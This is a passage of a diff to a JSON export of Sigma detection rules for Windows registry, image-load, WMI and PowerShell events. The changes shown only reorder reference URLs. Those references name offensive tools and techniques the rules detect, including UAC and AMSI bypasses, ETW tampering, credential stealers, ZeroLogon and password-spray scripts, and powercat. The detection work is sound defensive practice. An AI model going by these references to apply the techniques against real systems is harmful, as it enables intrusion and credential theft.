+22976,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" ], "tags": [ @@ -23012,8 +23012,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior", "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", + "https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml" ], "tags": [ @@ -23079,8 +23079,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], @@ -23104,10 +23104,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ @@ -23148,8 +23148,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", + "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" ], "tags": [ @@ -23215,9 +23215,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks", "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md", + "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/", "https://twitter.com/nas_bench/status/1626648985824788480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" ], @@ -23286,8 +23286,8 @@ "logsource.product": "windows", "refs": [ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ @@ -23310,17 +23310,17 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://twitter.com/_xpn_/status/1268712093928378368", "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ @@ -23396,8 +23396,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ @@ -23430,8 +23430,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" ], "tags": [ @@ -23497,11 +23497,11 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage", "https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl", + "https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], "tags": [ @@ -23534,8 +23534,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" ], "tags": [ @@ -23568,10 +23568,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", - "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://persistence-info.github.io/Data/ifilters.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ @@ -23627,8 +23627,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" ], "tags": [ @@ -23652,8 +23652,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" ], "tags": [ @@ -23720,9 +23720,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" ], "tags": [ @@ -23757,9 +23757,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", "https://twitter.com/dez_/status/986614411711442944", "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ @@ -23964,8 +23964,8 @@ "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html", - "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" ], "tags": [ @@ -24044,9 +24044,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://github.com/bohops/WSMan-WinRM", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], @@ -24724,12 +24724,12 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://github.com/Wh04m1001/SysmonEoP", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ @@ -24815,8 +24815,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "Internal Research", "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" ], "tags": [ @@ -25034,8 +25034,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "Internal Research", "https://github.com/gabe-k/themebleed", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_remote_share_load.yml" ], "tags": [ @@ -25112,10 +25112,10 @@ "logsource.product": "windows", "refs": [ "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", - "https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/", "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://hijacklibs.net/", + "https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -25425,9 +25425,9 @@ "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", - "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", - "https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", + "https://www.swascan.com/cactus-ransomware-malware-analysis/", + "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml" ], "tags": [ @@ -25590,8 +25590,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", + "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" ], "tags": [ @@ -25625,9 +25625,9 @@ "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", - "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", - "https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", + "https://www.swascan.com/cactus-ransomware-malware-analysis/", + "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml" ], "tags": [ @@ -25928,10 +25928,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://thewover.github.io/Introducing-Donut/", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/tyranid/DotNetToJScript", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://thewover.github.io/Introducing-Donut/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ @@ -26051,9 +26051,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml" ], "tags": [ @@ -26130,8 +26130,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/tifkin_/status/1321916444557365248", "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml" ], "tags": [ @@ -26208,8 +26208,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", + "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ @@ -26296,8 +26296,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/StopMalvertisin/status/1648604148848549888", - "https://www.roboform.com/", "https://twitter.com/t3ft3lb/status/1656194831830401024", + "https://www.roboform.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml" ], "tags": [ @@ -26538,8 +26538,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/", + "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_smadhook.yml" ], "tags": [ @@ -26917,8 +26917,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/ly4k/SpoolFool", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" ], "tags": [ @@ -27150,10 +27150,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", - "https://github.com/S12cybersecurity/RDPCredentialStealer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://github.com/S12cybersecurity/RDPCredentialStealer", + "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml" ], "tags": [ @@ -27229,9 +27229,9 @@ "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected", - "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected", + "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected", + "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" ], "tags": [ @@ -27264,9 +27264,9 @@ "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -27299,9 +27299,9 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://nmap.org/ncat/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ @@ -27334,9 +27334,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -27865,8 +27865,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], @@ -27901,8 +27901,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/samratashok/ADModule", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" ], "tags": [ @@ -28145,8 +28145,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" ], "tags": [ @@ -28254,24 +28254,24 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/adrecon/ADRecon", "https://github.com/adrecon/AzureADRecon", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/Kevin-Robertson/Powermad", - "https://adsecurity.org/?p=2921", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/besimorhino/powercat", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/calebstewart/CVE-2021-1675", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/samratashok/nishang", + "https://github.com/Kevin-Robertson/Powermad", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/adrecon/ADRecon", + "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" ], "tags": [ @@ -28638,23 +28638,23 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/besimorhino/powercat", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + 